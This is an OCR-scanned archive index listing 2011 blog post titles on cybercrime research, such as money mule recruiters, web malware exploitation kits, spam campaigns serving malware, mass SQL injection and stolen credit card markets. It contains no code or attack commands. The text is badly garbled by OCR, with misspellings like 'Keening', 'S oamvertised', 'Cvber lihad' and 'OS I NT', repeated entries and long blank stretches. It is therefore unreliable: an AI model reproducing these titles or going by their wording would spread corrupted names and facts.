(2011-07-07 12:24 ) 

■ Keening Money Mule Recruiters on a Short Leash 

- Part Ten (2011-07-07 13:25 ) 

■ Keening Money Mule Recruiters on a Short Leash 

- Part Ten (2011-07-07 13:25 ) 

August 






































































■ Summarizing ZDNet's Zero Dav Posts for lulv 
(2011-08-22 18:06 ) 

■ A Peek Inside Web Malware Exploitation Kits 
(2011-08-29 13:19 ) 

■ Keeping Money Mule Recruiters on a Short Leash 

- Part Eleven (2011-08-29 15:51 ) 

■ Keeoino Money Mule Recruiters on a Short Leash 

- Part Eleven (2011-08-29 15:51 ) 

September 

■ Summarizing 3 Years of Research Into Cvber 
lihad (2011-09-11 13:34 ) 

■ Summarizing ZDNet's Zero Dav Posts for August 
(2011-09-27 19:13 ) 

■ S oamvertised 'Uniform Traffic Ticket 1 and 'FDIC 
Notifications' Serving Malware - Historical OS I NT 
(2011-09-28 14:43 ) 

■ S oamvertised 'Uniform Traffic Ticket 1 and 'FDIC 
Notifications' Serving Malware - Historical OS I NT 
(2011-09-28 14:43 ) 

October 

■ Summarizing ZDNet's Zero Dav Posts for 
Se ptember (2011-10-04 14:37 ) 

■ S oamvertised "NACHA security nitification" 
Serving Malware - Historical OS!NT (2011-10-04 
14:38 ) 

■ S oamvertised "IRS notice" Serving Malware 
(2011-10-09 19:53 ) 

• S oamvertised IRS-themed "Last Notice" Emails 

Serving Malware (2011-10-18 21:45 ) 

■ Dissecting the Ongoing Mass SOL Injection 
Attack (2011-10-20 23:36 ) 

■ Dissecting the Ongoing Mass SOL Injection 
Attack (2011-10-20 23:36 ) 

■ Exposing the Market for Stolen Credit Cards 
Data (2011-10-31 02:07 ) 

December 











































































Summarizing ZD Net's Zero Day Posts for 
October (2011-12-04 21:05 ) 







